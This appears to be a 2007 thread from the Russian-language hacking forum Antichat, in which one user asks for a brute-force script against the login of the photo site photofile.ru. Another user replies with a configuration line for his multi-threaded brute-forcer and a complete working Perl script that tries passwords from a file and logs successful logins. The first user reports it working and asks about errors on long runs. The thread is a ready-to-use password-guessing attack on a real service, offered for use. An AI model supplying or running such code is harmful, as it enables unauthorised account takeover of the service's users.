Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   скрипт для брута photofile.ru (https://forum.antichat.xyz/showthread.php?t=34775)

ysmat 06.03.2007 00:14
скрипт для брута photofile.ru
 
кто сумеет написать
вот форма для ввода пароля
Код:
<FORM action=http://photofile.ru/login/ method=post><INPUT type=hidden value=/index.php
      name=return_url>
      <TABLE cellSpacing=1 cellPadding=0 border=0>
       
        <TR>
          <TD align=right>&nbsp;Логин:&nbsp;</TD>
          <TD><INPUT id=login_login tabIndex=2 size=10 name=login></TD>
          <TD class=small noWrap><INPUT tabIndex=5 type=checkbox value=1
            name=remember>запомнить</TD></TR>
        <TR>
          <TD>&nbsp;Пароль:&nbsp;</TD>
          <TD noWrap><INPUT id=login_pass tabIndex=3 type=password size=10
            name=password></TD>
          <TD style="PADDING-LEFT: 4px"><INPUT class=button onclick="return LoginFormCheck();" tabIndex=4 type=submit value=войти></TD></TR>
        <TR align=middle>
желательно на перле для возможности запуска на хосте
я пробовал wwwhack скорость достаточно приличная если
использовать самописный брут то наверное будет еще быстрее
при вводе правильного пароля переход на http://photofile.ru/index.php
неправильного http://photofile.ru/forgot/
на основе этого сразу можно сделать вывод о валидности пароля
wwwhack полностью загружает страницу http://photofile.ru/forgot
и ищет в ней слова которых нет в случаи правильного пароля
я поставил (Напоминание пароля Забыли пароль) наверняка этот метод медленнее

Digimortal 07.03.2007 00:52
найдите в разделе "про почту" мой брутфорсер dhomo.. добавьте в его базу строчку вида
['photofile.ru', 'return_url=%2Findex.php&login=zlogin&password=zpa ss', '/login/', 'http://photofile.ru/index.php', 300, 'Set-Cookie', 'photofile.ru']
нужный логин (или логины) пропишите в файле emails.txt как login@photofile.ru и сможете брутить в десяток потоков..

или заюзайте вот этот простенький скриптик:
Код:
#!/usr/bin/perl -w

use IO::Socket;

my $login = shift || die "enter login as argument\n";

open my $p, "<", 'passwords.txt' or die "Can\'t open passwords.txt\n";
while (<$p>) { chomp;

my $sock = new IO::Socket::INET (PeerAddr => 'photofile.ru',
      PeerPort => 80, PeerProto => 'tcp', TimeOut => 20);

my $pdata="return_url=%2Findex.php&login=$login&password=$_";
my $len=length($pdata);
my $request="POST /login/ HTTP/1.1\n".
        "Host: photofile.ru\n".
        "User-Agent: Mozilla/5.0\n".
        "Keep-Alive: 300\n".
        "Connection: keep-alive\n".
        "Referer: http://photofile.ru/index.php\n".
        "Content-Type: application/x-www-form-urlencoded\n".
        "Content-Length: $len\n\n$pdata";

print $sock $request;
sysread ($sock, my $an, 300); if ($an=~m/forgot/==0)
        { open my $l, ">>", 'result.txt'; print $l "$login:$_";
          print "\a$login:$_"; close $l; exit;}}
         
close $p; print "nothing found..\n";

ysmat 07.03.2007 21:45
на маленьком словаре все работает
а вот на большом при длительном бруте переодически выдает такие строчки
Код:
thread failed to start: Can't use an undefined value as a symbol reference at C:\dhomo.pl line 96, <$passwd> line 330
что они означают?
есть подозрения что photofile блокирует подбор через определенное время
ну все равно благадарю за помощь + поставил :)

Digimortal 07.03.2007 21:55
просто многопоточность у меня в бруте еще на стадии доработки ).. сколько потоков выставил?
и по поводу брутфорсера отписуйся в топике по нем лучше..


Время: 11:18